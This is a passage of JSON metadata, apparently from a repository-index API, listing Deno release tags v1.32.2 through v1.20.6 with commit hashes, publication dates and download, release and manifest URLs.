c576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"